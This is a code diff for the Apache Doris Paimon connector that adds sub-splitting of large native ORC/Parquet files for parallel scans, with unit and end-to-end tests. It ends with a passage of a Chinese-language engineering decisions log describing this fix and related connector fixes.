plan-doc/tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 449d0e4243cd0e..5c9427c9469718 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -140,6 +140,21 @@ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { // bypassing the native ORC/Parquet readers to dodge native-reader bugs. Default false (legacy default). private static final String FORCE_JNI_SCANNER = "force_jni_scanner"; + // FIX-NATIVE-SUBSPLIT (M-3): file-split session vars (byte-identical to SessionVariable.{FILE_SPLIT_SIZE, + // MAX_INITIAL_FILE_SPLIT_SIZE, MAX_FILE_SPLIT_SIZE, MAX_INITIAL_FILE_SPLIT_NUM, MAX_FILE_SPLIT_NUM}), + // read via the same VariableMgr.toMap channel as ENABLE_PAIMON_CPP_READER. They drive the native + // sub-split target size, mirroring legacy PaimonScanNode.determineTargetFileSplitSize without + // importing fe-core SessionVariable/FileSplitter. Defaults below are byte-identical to SessionVariable. + private static final String FILE_SPLIT_SIZE = "file_split_size"; + private static final String MAX_INITIAL_FILE_SPLIT_SIZE = "max_initial_file_split_size"; + private static final String MAX_FILE_SPLIT_SIZE = "max_file_split_size"; + private static final String MAX_INITIAL_FILE_SPLIT_NUM = "max_initial_file_split_num"; + private static final String MAX_FILE_SPLIT_NUM = "max_file_split_num"; + private static final long DEFAULT_MAX_INITIAL_FILE_SPLIT_SIZE = 32L * 1024 * 1024; + private static final long DEFAULT_MAX_FILE_SPLIT_SIZE = 64L * 1024 * 1024; + private static final long DEFAULT_MAX_INITIAL_FILE_SPLIT_NUM = 200L; + private static final long DEFAULT_MAX_FILE_SPLIT_NUM = 100000L; + // FIX-SCHEMA-EVOLUTION (B-1a): scan-level prop carrying the base64 TBinaryProtocol-serialized // schema dictionary (a throwaway TFileScanRangeParams holding current_schema_id + // history_schema_info). getScanNodeProperties builds it from the live table; populateScanLevelParams @@ -347,6 +362,10 @@ private List planScanInternal( long countSum = 0; DataSplit countRepresentative = null; + // FIX-NATIVE-SUBSPLIT: target file split size for native ORC/Parquet sub-splitting, computed + // lazily ONCE on the first native split (legacy hasDeterminedTargetFileSplitSize parity). + long targetSplitSize = -1; + // Process DataSplits for (DataSplit dataSplit : dataSplits) { if (isCountPushdownSplit(countPushdown, dataSplit)) { @@ -365,14 +384,25 @@ private List planScanInternal( if (shouldUseNativeReader(paimonHandle.isForceJni(), isForceJniScannerEnabled(session), optRawFiles)) { - // Native reader path + // Native reader path: sub-split large ORC/Parquet files for read parallelism + // (FIX-NATIVE-SUBSPLIT), mirroring legacy fileSplitter.splitFile. Under COUNT(*) pushdown + // legacy passes splittable=!applyCountPushdown, so a native split that reaches this arm + // (i.e. NOT siphoned to the count arm because its merged count is not precomputed — e.g. a + // DV with null cardinality) is kept WHOLE. We mirror that by passing target size 0, which + // makes buildNativeRanges emit a single whole-file range; the target heuristic is then not + // needed (and not computed) under count pushdown. + if (!countPushdown && targetSplitSize < 0) { + targetSplitSize = resolveTargetSplitSize(session, dataSplits); + } + long effectiveSplitSize = countPushdown ? 0L : targetSplitSize; List rawFiles = optRawFiles.get(); for (int i = 0; i < rawFiles.size(); i++) { + RawFile file = rawFiles.get(i); DeletionFile deletionFile = (optDeletionFiles.isPresent() && i < optDeletionFiles.get().size()) ? optDeletionFiles.get().get(i) : null; - ranges.add(buildNativeRange( - rawFiles.get(i), deletionFile, defaultFileFormat, partitionValues)); + ranges.addAll(buildNativeRanges(file, deletionFile, defaultFileFormat, + partitionValues, effectiveSplitSize)); } } else { // JNI reader path @@ -403,12 +433,12 @@ private List planScanInternal( * unit-testable without a live deletion-vector-bearing split. */ PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, - String defaultFileFormat, Map partitionValues) { + String defaultFileFormat, Map partitionValues, long start, long length) { String fileFormat = getFileFormatBySuffix(file.path()).orElse(defaultFileFormat); PaimonScanRange.Builder builder = new PaimonScanRange.Builder() .path(normalizeUri(file.path())) - .start(0) - .length(file.length()) + .start(start) + .length(length) .fileSize(file.length()) .fileFormat(fileFormat) .partitionValues(partitionValues) @@ -420,6 +450,27 @@ PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, return builder.build(); } + /** + * Builds the native sub-range(s) for one raw ORC/Parquet file (FIX-NATIVE-SUBSPLIT): slices it at + * {@code targetSplitSize} via {@link #computeFileSplitOffsets} and emits one {@link PaimonScanRange} + * per {@code [start, length)} sub-range. The SAME per-file deletion vector is attached to EVERY + * sub-range — BE indexes the DV by GLOBAL file row position, so disjoint sub-ranges share the + * unmodified deletion file (no offset re-basing); attaching it to only some sub-ranges would let + * deleted rows reappear in the others (merge-on-read corruption). A non-positive + * {@code targetSplitSize} yields a single whole-file range (used under COUNT(*) pushdown, where + * legacy keeps the split whole via {@code splittable=!applyCountPushdown}). Package-private so the + * DV-on-every-sub-range invariant is unit-testable without a live DV-bearing split. + */ + List buildNativeRanges(RawFile file, DeletionFile deletionFile, + String defaultFileFormat, Map partitionValues, long targetSplitSize) { + List result = new ArrayList<>(); + for (long[] offset : computeFileSplitOffsets(file.length(), targetSplitSize)) { + result.add(buildNativeRange( + file, deletionFile, defaultFileFormat, partitionValues, offset[0], offset[1])); + } + return result; + } + /** * Normalizes a raw paimon-SDK storage URI (native data-file or deletion-vector path) into BE's * canonical scheme via the engine ({@code oss://}/{@code cos://}/{@code obs://}/{@code s3a://} @@ -595,6 +646,108 @@ private PaimonScanRange buildCountRange(DataSplit dataSplit, String tableLocatio .build(); } + /** + * Slices a native data file into {@code [start, length]} sub-ranges for read parallelism + * (FIX-NATIVE-SUBSPLIT), porting the specified-size branch of legacy {@code FileSplitter.splitFile} + * (the connector has no block locations, so the block-based branch is never reached). Byte-identical + * to {@code FileSplitter.java:129-144}, including the + * {@code > 1.1D} tail guard — the LAST range absorbs a remainder of up to 1.1× the + * target instead of emitting a tiny tail split (a naive {@code ceilDiv} would differ). The ranges + * tile {@code [0, fileLength)} contiguously with no gap/overlap. A zero/negative file length yields + * no range (legacy skips empty files); a non-positive target yields a single whole-file range — + * used under COUNT(*) pushdown (see {@link #buildNativeRanges}, where legacy keeps the split whole + * via {@code splittable=!applyCountPushdown}); {@link #determineTargetSplitSize} otherwise never + * returns ≤ 0. Pure static so the offset math is unit-testable against the fe-core source it ports. + */ + static List computeFileSplitOffsets(long fileLength, long targetSplitSize) { + List result = new ArrayList<>(); + if (fileLength <= 0) { + return result; + } + if (targetSplitSize <= 0) { + result.add(new long[] {0L, fileLength}); + return result; + } + long bytesRemaining; + for (bytesRemaining = fileLength; + (double) bytesRemaining / (double) targetSplitSize > 1.1D; + bytesRemaining -= targetSplitSize) { + result.add(new long[] {fileLength - bytesRemaining, targetSplitSize}); + } + if (bytesRemaining != 0L) { + result.add(new long[] {fileLength - bytesRemaining, bytesRemaining}); + } + return result; + } + + /** + * Computes the native target file split size, porting legacy + * {@code PaimonScanNode.determineTargetFileSplitSize} + {@code FileQueryScanNode.applyMaxFileSplitNumLimit} + * with plain longs (the connector cannot import {@code SessionVariable}). The legacy + * {@code isBatchMode -> 0} branch is omitted: paimon is never batch-mode on the plugin path. Pure + * static so the heuristic is unit-testable. + */ + static long determineTargetSplitSize(long fileSplitSize, long maxInitialSplitSize, long maxSplitSize, + long maxInitialSplitNum, long maxFileSplitNum, long totalNativeFileSize) { + if (fileSplitSize > 0) { + return fileSplitSize; + } + long result = (totalNativeFileSize >= maxSplitSize * maxInitialSplitNum) + ? maxSplitSize : maxInitialSplitSize; + if (maxFileSplitNum > 0 && totalNativeFileSize > 0) { + long minSplitSizeForMaxNum = (totalNativeFileSize + maxFileSplitNum - 1L) / maxFileSplitNum; + result = Math.max(result, minSplitSizeForMaxNum); + } + return result; + } + + /** + * Reads the 5 file-split session vars (VariableMgr.toMap channel) and sums the native-eligible + * file sizes across {@code dataSplits}, then delegates to the pure-static + * {@link #determineTargetSplitSize}. Mirrors legacy {@code determineTargetFileSplitSize}'s + * once-per-scan computation (summing every {@code supportNativeReader}-eligible RawFile, like + * {@code PaimonScanNode.java:552-564}). + */ + private long resolveTargetSplitSize(ConnectorSession session, List dataSplits) { + long totalNativeFileSize = 0; + for (DataSplit dataSplit : dataSplits) { + Optional> rawFiles = dataSplit.convertToRawFiles(); + if (!supportNativeReader(rawFiles)) { + continue; + } + for (RawFile file : rawFiles.get()) { + totalNativeFileSize += file.fileSize(); + } + } + return determineTargetSplitSize( + sessionLong(session, FILE_SPLIT_SIZE, 0L), + sessionLong(session, MAX_INITIAL_FILE_SPLIT_SIZE, DEFAULT_MAX_INITIAL_FILE_SPLIT_SIZE), + sessionLong(session, MAX_FILE_SPLIT_SIZE, DEFAULT_MAX_FILE_SPLIT_SIZE), + sessionLong(session, MAX_INITIAL_FILE_SPLIT_NUM, DEFAULT_MAX_INITIAL_FILE_SPLIT_NUM), + sessionLong(session, MAX_FILE_SPLIT_NUM, DEFAULT_MAX_FILE_SPLIT_NUM), + totalNativeFileSize); + } + + /** + * Reads a long session var from the SPI session properties (VariableMgr.toMap channel), falling + * back to {@code defaultValue} when absent/blank/unparseable. Mirrors the null-tolerant + * {@link #isCppReaderEnabled} pattern. + */ + private static long sessionLong(ConnectorSession session, String key, long defaultValue) { + if (session == null) { + return defaultValue; + } + String value = session.getSessionProperties().get(key); + if (value == null || value.trim().isEmpty()) { + return defaultValue; + } + try { + return Long.parseLong(value.trim()); + } catch (NumberFormatException e) { + return defaultValue; + } + } + private long computeSplitWeight(DataSplit dataSplit) { List metas = dataSplit.dataFiles(); if (metas != null && !metas.isEmpty()) { diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 7cd1fad206cb30..9c93f239d2e4c9 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -59,6 +59,7 @@ import java.util.Arrays; import java.util.Base64; import java.util.Collections; +import java.util.Comparator; import java.util.HashMap; import java.util.List; import java.util.Map; @@ -267,7 +268,7 @@ public void nativeRangeNormalizesBothDataAndDeletionVectorPaths() { "oss://bkt/warehouse/db/t/index/dv-0.index", 8L, 16L, 4L); PaimonScanRange range = provider.buildNativeRange( - file, dv, "parquet", Collections.emptyMap()); + file, dv, "parquet", Collections.emptyMap(), 0L, 100L); // WHY: BE's scheme-dispatched S3 file factory only opens canonical s3://. An un-normalized // oss:// DATA-file path fails the native ORC/Parquet read outright; an un-normalized oss:// DV @@ -291,7 +292,8 @@ public void nativeRangeWithoutDeletionVectorNormalizesOnlyDataPath() { new HashMap<>(), new RecordingPaimonCatalogOps(), ctx); PaimonScanRange range = provider.buildNativeRange( - parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", Collections.emptyMap()); + parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", + Collections.emptyMap(), 0L, 100L); // WHY: a DV-less native split must still normalize its data-file path and must NOT emit a DV // descriptor. MUTATION: emitting a deletion_file for a null DV, or skipping data normalization -> red. @@ -310,7 +312,8 @@ public void nativeRangeWithoutContextPreservesRawPath() { new HashMap<>(), new RecordingPaimonCatalogOps()); PaimonScanRange range = provider.buildNativeRange( - parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", Collections.emptyMap()); + parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", + Collections.emptyMap(), 0L, 100L); // MUTATION: NPE on null context, or fabricating a normalized path from nothing -> red. Assertions.assertEquals("oss://bkt/a/part-0.parquet", range.getPath().orElse(null)); @@ -609,6 +612,211 @@ public void countPushdownCollapsesMultipleSplitsToOneRangeBearingSummedTotal( } } + // ---- FIX-NATIVE-SUBSPLIT (M-3) ---- + + private static final long MB = 1024L * 1024L; + + /** Asserts the [start,length] ranges tile [0, fileLength) with no gap/overlap and positive lengths. */ + private static void assertContiguousTiling(List ranges, long fileLength) { + long expectedStart = 0; + for (long[] r : ranges) { + Assertions.assertEquals(expectedStart, r[0], + "ranges must tile contiguously with no gap/overlap"); + Assertions.assertTrue(r[1] > 0, "every range length must be positive"); + expectedStart += r[1]; + } + Assertions.assertEquals(fileLength, expectedStart, "ranges must cover exactly [0, fileLength)"); + } + + @Test + public void computeFileSplitOffsetsTilesWithOneTenthTailGuard() { + // 250MB / 64MB: the >1.1D guard keeps the 58MB remainder in the LAST range (no tiny 5th split) — + // byte-identical to legacy FileSplitter.splitFile. MUTATION: naive ceilDiv -> a 5th 58MB-or-tiny + // split / wrong last length -> red. + List s = PaimonScanPlanProvider.computeFileSplitOffsets(250 * MB, 64 * MB); + Assertions.assertEquals(4, s.size(), + "250MB/64MB -> 4 ranges (the 1.1x tail guard absorbs the 58MB remainder)"); + assertContiguousTiling(s, 250 * MB); + Assertions.assertEquals(64 * MB, s.get(0)[1]); + Assertions.assertEquals(58 * MB, s.get(3)[1], "last range absorbs the remainder (58MB < 1.1x target)"); + + // 256MB / 64MB: exact multiple -> 4 even ranges (the last is exactly 64MB, not 0). + List even = PaimonScanPlanProvider.computeFileSplitOffsets(256 * MB, 64 * MB); + Assertions.assertEquals(4, even.size()); + assertContiguousTiling(even, 256 * MB); + Assertions.assertEquals(64 * MB, even.get(3)[1]); + } + + @Test + public void computeFileSplitOffsetsKeepsSmallOrEmptyFilesCorrect() { + // fileLen <= 1.1*target -> ONE whole-file range (the 1.1x guard avoids a tiny tail). + List small = PaimonScanPlanProvider.computeFileSplitOffsets(70 * MB, 64 * MB); + Assertions.assertEquals(1, small.size(), "70MB <= 1.1*64MB -> one whole-file range"); + Assertions.assertArrayEquals(new long[] {0L, 70 * MB}, small.get(0)); + + // zero/negative length -> no range (legacy FileSplitter skips empty files). + Assertions.assertTrue(PaimonScanPlanProvider.computeFileSplitOffsets(0L, 64L).isEmpty()); + Assertions.assertTrue(PaimonScanPlanProvider.computeFileSplitOffsets(-5L, 64L).isEmpty()); + + // non-positive target -> single whole-file range (defensive; never happens on the connector path). + List defensive = PaimonScanPlanProvider.computeFileSplitOffsets(123L, 0L); + Assertions.assertEquals(1, defensive.size()); + Assertions.assertArrayEquals(new long[] {0L, 123L}, defensive.get(0)); + } + + @Test + public void determineTargetSplitSizeMirrorsLegacyHeuristic() { + long init = 32 * MB; // max_initial_file_split_size default + long max = 64 * MB; // max_file_split_size default + long initNum = 200; // max_initial_file_split_num default + long maxNum = 100000; // max_file_split_num default + + // file_split_size > 0 wins outright (legacy: the explicit override short-circuit). + Assertions.assertEquals(7L, + PaimonScanPlanProvider.determineTargetSplitSize(7L, init, max, initNum, maxNum, 999L * MB)); + // total below max*initNum (64MB*200 = 12800MB) -> initial split size (32MB). + Assertions.assertEquals(init, + PaimonScanPlanProvider.determineTargetSplitSize(0L, init, max, initNum, maxNum, 1024L * MB)); + // total at/above max*initNum -> max split size (64MB). + Assertions.assertEquals(max, + PaimonScanPlanProvider.determineTargetSplitSize(0L, init, max, initNum, maxNum, 20000L * MB)); + // max_file_split_num floor raises the size above the heuristic: ceil(total/maxNum) > 64MB. + long hugeTotal = 10_000_000L * MB; // ceil(/100000) = 100MB > 64MB + Assertions.assertEquals((hugeTotal + maxNum - 1L) / maxNum, + PaimonScanPlanProvider.determineTargetSplitSize(0L, init, max, initNum, maxNum, hugeTotal), + "max_file_split_num floor (ceil(total/maxNum)) must raise the target above 64MB"); + } + + @Test + public void nativeFileIsSubSplitWhenFileSplitSizeForcesIt(@TempDir Path warehouse) throws Exception { + // An append-only (no-PK) table yields a native-eligible raw file; a small file_split_size forces + // that single file to slice into >=2 contiguous sub-ranges end-to-end through planScan. + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + catalog.createDatabase("db", false); + Identifier id = Identifier.create("db", "t"); + catalog.createTable(id, Schema.newBuilder() + .column("id", DataTypes.INT()) + .column("val", DataTypes.BIGINT()) + .build(), false); // no primary key -> append-only -> convertToRawFiles present + Table table = catalog.getTable(id); + BatchWriteBuilder wb = table.newBatchWriteBuilder(); + try (BatchTableWrite write = wb.newWrite()) { + for (int i = 0; i < 200; i++) { + write.write(GenericRow.of(i, (long) i * 10)); + } + List messages = write.prepareCommit(); + try (BatchTableCommit commit = wb.newCommit()) { + commit.commit(messages); + } + } + + // Precondition: exactly ONE native raw file, so the contiguous-tiling check is over one file. + List rawFiles = new ArrayList<>(); + for (Split s : table.newReadBuilder().newScan().plan().splits()) { + if (s instanceof DataSplit) { + ((DataSplit) s).convertToRawFiles().ifPresent(rawFiles::addAll); + } + } + Assertions.assertEquals(1, rawFiles.size(), + "fixture precondition: append-only commit must yield exactly one native raw file"); + long fileLength = rawFiles.get(0).length(); + Assertions.assertTrue(fileLength > 0, "fixture raw file must be non-empty"); + long splitSize = Math.max(1L, fileLength / 3); // ~3 sub-ranges + + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = table; + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + PaimonTableHandle handle = new PaimonTableHandle( + "db", "t", Collections.emptyList(), Collections.emptyList()); + List noColumns = Collections.emptyList(); + + // Small file_split_size -> the single native file MUST sub-split into >=2 contiguous ranges. + // WHY: this is the whole fix — one scanner per large file becomes N parallel sub-ranges. + // MUTATION: neuter computeFileSplitOffsets to a single whole-file range -> nativeRanges==1 -> red. + ConnectorSession splitting = sessionWithProps( + Collections.singletonMap("file_split_size", String.valueOf(splitSize))); + List ranges = provider.planScan( + splitting, handle, noColumns, Optional.empty(), -1, null, /*countPushdown*/ false); + List nativeRanges = new ArrayList<>(); + for (ConnectorScanRange r : ranges) { + if (r.getPath().isPresent()) { // native ranges carry a file path; JNI ranges do not + nativeRanges.add(r); + } + } + Assertions.assertTrue(nativeRanges.size() >= 2, + "a small file_split_size must sub-split the native file into >=2 ranges, got " + + nativeRanges.size()); + nativeRanges.sort(Comparator.comparingLong(ConnectorScanRange::getStart)); + long expectedStart = 0; + for (ConnectorScanRange r : nativeRanges) { + Assertions.assertEquals(expectedStart, r.getStart(), + "native sub-ranges must tile [0, fileLength) contiguously"); + Assertions.assertTrue(r.getLength() > 0, "every sub-range length must be positive"); + Assertions.assertEquals(fileLength, r.getFileSize(), + "every sub-range must report the WHOLE file size, not the sub-range length"); + expectedStart += r.getLength(); + } + Assertions.assertEquals(fileLength, expectedStart, + "native sub-ranges must cover exactly [0, fileLength)"); + + // Contrast: with the default (large) split size the small file stays a SINGLE native range. + List whole = provider.planScan( + sessionWithProps(Collections.emptyMap()), handle, noColumns, Optional.empty(), + -1, null, false); + long wholeNative = whole.stream().filter(r -> r.getPath().isPresent()).count(); + Assertions.assertEquals(1, wholeNative, + "with the default 32MB+ split size the small fixture file stays one native range"); + } + } + + @Test + public void buildNativeRangesAttachesSameDeletionVectorToEverySubRange() { + RecordingConnectorContext ctx = new RecordingConnectorContext(); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps(), ctx); + RawFile file = parquetRawFile("oss://bkt/a/part-0.parquet"); + DeletionFile dv = new DeletionFile("oss://bkt/a/index/dv-0.index", 8L, 16L, 4L); + long target = Math.max(1L, file.length() / 3); // force the file to sub-split into >=2 ranges + + List ranges = provider.buildNativeRanges( + file, dv, "parquet", Collections.emptyMap(), target); + + // WHY: the load-bearing correctness claim of FIX-NATIVE-SUBSPLIT — a paimon deletion vector is a + // bitmap of GLOBAL file row positions, so EVERY sub-range of a DV-bearing file must carry the + // same (unmodified) deletion file. If sub-ranges 2..N dropped it, their deleted rows would + // reappear (merge-on-read corruption). MUTATION: attaching the DV only to the first (or last) + // sub-range, or dropping it on sub-ranges -> a sub-range with a null/!= deletion_file.path -> red. + Assertions.assertTrue(ranges.size() >= 2, + "fixture must sub-split into >=2 ranges, got " + ranges.size()); + String expectedDv = ranges.get(0).getProperties().get("paimon.deletion_file.path"); + Assertions.assertNotNull(expectedDv, + "the DV-bearing file's sub-ranges must carry a deletion file"); + for (PaimonScanRange r : ranges) { + Assertions.assertEquals(expectedDv, r.getProperties().get("paimon.deletion_file.path"), + "every native sub-range must carry the same deletion vector (global-row-position DV)"); + } + } + + @Test + public void buildNativeRangesKeepsFileWholeWhenTargetNonPositive() { + // Under COUNT(*) pushdown the native arm passes target size 0 so a native split that was NOT + // siphoned to the count arm (no precomputed merged count) is kept WHOLE — legacy parity + // (splittable=!applyCountPushdown). MUTATION: sub-splitting under count pushdown -> >1 range -> red. + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps()); + RawFile file = parquetRawFile("oss://bkt/a/part-0.parquet"); + + List ranges = provider.buildNativeRanges( + file, null, "parquet", Collections.emptyMap(), 0L); + + Assertions.assertEquals(1, ranges.size(), + "a non-positive target (COUNT(*) pushdown) must keep the file as one whole-file range"); + Assertions.assertEquals(0L, ranges.get(0).getStart()); + Assertions.assertEquals(file.length(), ranges.get(0).getLength(), + "the whole-file range must span the entire file"); + } + private static ConnectorSession sessionWithProps(Map sessionProps) { return new ConnectorSession() { @Override diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 5279f7260c845a..9ac37201e1e4c6 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-055 | P5-fix#9 | **FIX-NATIVE-SUBSPLIT(M-3,round-2 MAJOR/round-1 MINOR,perf-parity)= fix-now(用户签字,2026-06-12)+ 纯连接器零 SPI/零 fe-core**:翻闸后大 native ORC/Parquet paimon 文件得**一个** scanner(无文件内并行)——连接器 native 臂每 RawFile 发**一个** `PaimonScanRange`(`.start(0).length(file.length())`),legacy `PaimonScanNode:434-465` 经 `determineTargetFileSplitSize`+`fileSplitter.splitFile` 把大文件切成多 split。结果正确仅并行度回归。recon(5-scout + 对抗 synthesizer `wf_ad764bf6-1c9`)三大结论:① **真 gap 非 no-op**——ORC/Parquet `compressType=PLAIN`(`FileSplitter:115`),`(!splittable||!=PLAIN)` 闸不触发→真切分跑;② **DV×sub-split 安全无须 guard**——paimon DV rowid 是文件**全局**行位置,BE native reader 在部分 byte range 内仍报全局行位(ORC `getRowNumber()` 由 stripe 起播种、Parquet `first_row` 跨 row-group 累计),`_kv_cache` 按 `path+offset` 跨 sub-split 共享 DV 位图,iceberg 用同机制于常规切分文件→**规则=同一 per-RawFile DeletionFile 原样附到每个 sub-range、不 re-base offset**(legacy `:459-460` parity);③ **纯连接器**——切分 math 是对 5 个 session var(`VariableMgr.toMap` 通道,同 `isCppReaderEnabled`)的 long 算术,连接器禁 import fe-core `FileSplitter`/`SessionVariable` 故逐字重述;`start/length/fileSize` 经既有 `PaimonScanRange.Builder`→`PluginDrivenSplit` FileSplit ctor→`FileQueryScanNode.createFileRangeDesc` 已序列化到 BE。**仅 specified-size 分支可达**(连接器传 blockLocations=null + target 恒>0 因 paimon 非 batch;block-based 分支死)。**修=纯连接器**:2 纯静态(`computeFileSplitOffsets` 逐字移植含 **`>1.1D` 尾吸收 guard**、`determineTargetSplitSize` 移植 determineTargetFileSplitSize+applyMaxFileSplitNumLimit 略去 isBatchMode→0)+ `sessionLong`/`resolveTargetSplitSize`(lazy once)+ native 臂改 buildNativeRange 加 (start,length) 内层 loop。守门:连接器 256/0/0(1 CI-gated skip)、checkstyle 0、import-gate 净、**fail-before 恰 3 splitting 测红**(neuter `computeFileSplitOffsets`→单 range)其余绿、end-to-end append-only 真表小 file_split_size→≥2 contig sub-range。split-weight 调度 nicety 不移植(pre-existing native 路已缺)= [DV-033]。真值闸=live-e2e 大文件并行 + DV-file 多 range 读(既有 legacy paimon regression 覆盖 BE 契约、本 fix 无 BE 改)。设计 [`P5-fix-NATIVE-SUBSPLIT-design.md`](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md) | 2026-06-12 | ✅ | | D-054 | P5-fix#8 | **FIX-COUNT-PUSHDOWN(M-2,round-2 MAJOR/round-1 MINOR,perf-parity)= fix-now + 新增 default `planScan` 7-arg overload 携 `boolean countPushdown` + 连接器 collapse-to-one(用户签字,2026-06-12)**:翻闸后 plugin-driven paimon `COUNT(*)` **结果正确但慢**——COUNT 枚举已达 BE(`FileScanNode.toThrift:90` 发 `pushDownAggNoGroupingOp`、`PhysicalPlanTranslator:873` 在 plugin 节点设 COUNT、未排除)且 per-range emit 缝**已建全**(`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`setTableLevelRowCount`,与 legacy `PaimonScanNode:303-308` byte-一致),唯独**信号+计算**缺:merged count `DataSplit.mergedRowCount()` 是 paimon-SDK-only 须连接器算,而 COUNT 信号 `getPushDownAggNoGroupingOp()==COUNT` 只在 fe-core 节点、`PluginDrivenScanNode.getSplits` 从不读(grep 0)也不在任何 `planScan`/`ConnectorSession`/`ConnectorContext`/handle → 连接器每 split 发 `table_level_row_count=-1` → BE 物化全 post-merge 行去 count(`file_scanner.cpp:1298-1326`),PK/MOR merge 表尤贵。**故非纯连接器(更正动手前 framing)**:信号须过 SPI 边界。**否决经 `ConnectorSession` 穿**(FIX-FORCE-JNI 先例)——agg-op 是 per-query planner 输出非 SET-var,会成静默无类型通道(本项目反复踩的 bug 类)。**用户定(vs defer)= fix-now**,且 **count-split 形状 = 连接器 collapse-to-one**(vs full-parity fe-core trim / vs per-split)。**修=3 文件**:① SPI `ConnectorScanPlanProvider` +1 **default** 7-arg `planScan(...,boolean countPushdown)` 委托 6-arg(镜像 limit/requiredPartitions 扩展链,其余连接器零改 no-op)[E15];② fe-core `PluginDrivenScanNode.getSplits` 读 `getPushDownAggNoGroupingOp()==TPushAggOp.COUNT` 传入(**无 post-loop 数学**);③ 连接器抽 `planScanInternal(...,countPushdown)`(4-arg 委托 false、7-arg 委托 flag)+ count 短路(**第一 routing 臂**,count-eligible split 不再发数据 range,否则 BE 双计 vs DV/PK-merge):累加全 eligible split 的 `mergedRowCount` 入 `countSum`、留首个为代表、循环后发**一** JNI count range 携 `countSum`(=legacy `<=10000` singletonList+assignCountToSplits 收一 split case);无 merged count 的 split 走常规 native/JNI 路 BE 自计(footer/物化)。两新成员=纯静态 `isCountPushdownSplit(boolean,DataSplit)`(mutation-test 路由闸)+ `buildCountRange`。**参数形状 `boolean`**(BE 只需 COUNT-vs-not、`TPushAggOp` 过度泛化)+ **paimon-only**=工程判断(未被否)。legacy `>10000` 并行 split trim **有意丢**(连接器无 numBackends,fe-core-only)= perf-only 偏差 [DV-032]。守门:连接器 252/0/0(1 CI-gated skip)、fe-core compile+checkstyle 0、import-gate 净、**fail-before 恰 2 新测红**(neuter `isCountPushdownSplit`→false)其余 33 绿、end-to-end 真 local PK 表测断言 collapse-to-one 携 merged total(2)。真值闸=live-e2e BE CountReader 选择/EXPLAIN(既有 legacy paimon count regression 覆盖 BE 契约、本 fix 无 BE 改)。设计 [`P5-fix-COUNT-PUSHDOWN-design.md`](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) | 2026-06-12 | ✅ | | D-053 | P5-fix#6 | **FIX-KERBEROS-DOAS / M-8(MAJOR,Kerberos-only,fe-core,filesystem+jdbc)= fix-now(用户签字,2026-06-11)**:翻闸后 filesystem/jdbc flavor 在 Kerberized HDFS 上丢 UGI `doAs`——连接器 `PaimonConnector.createCatalog` 已把建 catalog 包进 `context.executeAuthenticated`(:194),但其背后 authenticator 对这两 flavor 是**基类 no-op**:HDFS `HadoopExecutionAuthenticator` 仅在 `initializeCatalog()` 内构建(`PaimonFileSystemMetaStoreProperties:46`/`PaimonJdbcMetaStoreProperties:120`),而 `initializeCatalog` 在翻闸路径**死代码**(唯一 live 调用方=legacy `PaimonExternalCatalog:147`;plugin 路径经 `PaimonCatalogFactory` 自建 catalog)→ `PluginDrivenExternalCatalog.initPreExecutionAuthenticator:130` 读到 `AbstractPaimonProperties:45` 的 no-op → `executeAuthenticated` 不 doAs。HMS 不受影响(authenticator 在 `initNormalizeAndCheckProps:70` 即建、必跑)。**作用域=filesystem+jdbc only**(用户签):DLF/REST 排除——`PaimonAliyunDLFMetaStoreProperties` 从不设 authenticator、用 Aliyun AK/SK/STS 入 HiveConf 非 Kerberos UGI(无 doAs 可丢),故 review「DLF」从句 **overstated**;HMS 已对。**修=fe-core,零连接器改/零连接器-SPI**:新 fe-core hook `MetastoreProperties.initExecutionAuthenticator(List)`(default no-op)由 `PluginDrivenExternalCatalog.initPreExecutionAuthenticator` 用**已安全建好**的 `catalogProperty.getOrderedStoragePropertiesList()` 调(catalog-init 时机、与 legacy 同、避免每次 `MetastoreProperties.create` eager 重复 kerberos login);filesystem/jdbc override 之经 `AbstractPaimonProperties.initHdfsExecutionAuthenticator` 共享 helper 从 HDFS `StorageProperties` 建 authenticator(镜像 HMS)。**FE-unit 可测 wiring**(断言 `getExecutionAuthenticator()` 返 `HadoopExecutionAuthenticator`、不调 initializeCatalog),**真 doAs 端到端=live-Kerberos-e2e only**(无 paimon-kerberos regression 套件,[DV-031](./deviations-log.md))。守门:fe-core `Paimon{FileSystem,Jdbc}MetaStorePropertiesTest` 14/0/0、fail-before 双 red(no-op 